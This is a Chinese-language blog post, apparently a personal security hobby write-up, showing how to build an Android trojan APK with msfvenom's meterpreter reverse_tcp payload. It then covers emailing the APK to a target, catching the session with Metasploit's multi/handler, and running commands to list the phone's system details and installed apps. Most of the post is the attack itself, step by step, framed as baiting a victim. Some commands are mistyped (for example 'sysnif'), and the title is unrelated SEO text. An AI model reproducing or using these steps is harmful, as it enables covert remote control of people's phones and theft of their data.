網(wǎng)站建設(shè)的客戶在哪里山西seo關(guān)鍵詞優(yōu)化軟件搜索
額,這是我最后一篇文章了,周一我們開學(xué)了
文章目錄
- 前言
- 一、Metasploit是什么?
- 演示環(huán)境
- 二、生成可執(zhí)行木馬文件
- 1.生成
- 2.運行命令并生成木馬
- 配置參數(shù)
- 入侵安卓手機命令
- 1.查看對方手機系統(tǒng)信息
- 查看對方手機安裝哪些app文件
- 總結(jié)
前言
前言,前言這是我最難想出來的
對,這是我最后一篇文章,周一我們開學(xué)了,漏洞實戰(zhàn)怕實現(xiàn)不了,至少放假可以更文章,我們只放一天,
提示:以下是本篇文章正文內(nèi)容,下面案例可供參考
一、Metasploit是什么?
Metasploit是一個免費的、可下載的框架,通過它可以很容易地獲取、開發(fā)并對計算機軟件漏洞實施攻擊。它本身附帶數(shù)百個已知軟件漏洞的專業(yè)級漏洞攻擊工具。當H.D. Moore在2003年發(fā)布Metasploit時,計算機安全狀況也被永久性地改變了。仿佛一夜之間,任何人都可以成為黑客,每個人都可以使用攻擊工具來攻擊那些未打過補丁或者剛剛打過補丁的漏洞。軟件廠商再也不能推遲發(fā)布針對已公布漏洞的補丁了,這是因為Metasploit團隊一直都在努力開發(fā)各種攻擊工具,并將它們貢獻給所有Metasploit用戶。
Metasploit的設(shè)計初衷是打造成一個攻擊工具開發(fā)平臺,本書稍后將講解如何開發(fā)攻擊工具。然而在目前情況下,安全專家以及業(yè)余安全愛好者更多地將其當作一種點幾下鼠標就可以利用其中附帶的攻擊工具進行成功攻擊的環(huán)境。
工作方式編輯
演示環(huán)境
攻擊方:kali Linux 2022.4
被攻擊方:Android13 oppo color13.0
二、生成可執(zhí)行木馬文件
1.生成
msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口號> R > <文件名>.apk
示例
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.127 LPORT=5555 R >Android.apk
本地端口自己隨便設(shè)置一個沒有被占用的端口號,如果端口號被占用那么文件會生成失敗,換一個端口號就性
如何查看IP地址,用ifconfig
可以看到
2.運行命令并生成木馬
look,生成成功了,一定要用root權(quán)限打開,
然后發(fā)送,我喜歡用郵箱發(fā)送這比較快
look ther這樣比較快,
呃…安卓13防御能力不怎樣啊
然后打開msfconsole
配置參數(shù)
(1)命令: use exploit/multi/handler(選擇模塊)
(2)命令: set payload android/meterpreter/reverse_tcp(選擇攻擊模塊)
(3)命令: set LhOST 192.168.0.127(填寫自己主機的IP地址)
(4)命令: set lport 5555(填寫剛才生成文件時的端口號)
(5)命令: show options(查看設(shè)置參數(shù))
(6)命令: exploit (執(zhí)行)
好了,就等小魚上鉤了
安裝完成了
成功了
入侵安卓手機命令
1.查看對方手機系統(tǒng)信息
sysnif
查看對方手機安裝哪些app文件
applist
總結(jié)
時間不夠了,所以不做演示了,所以再見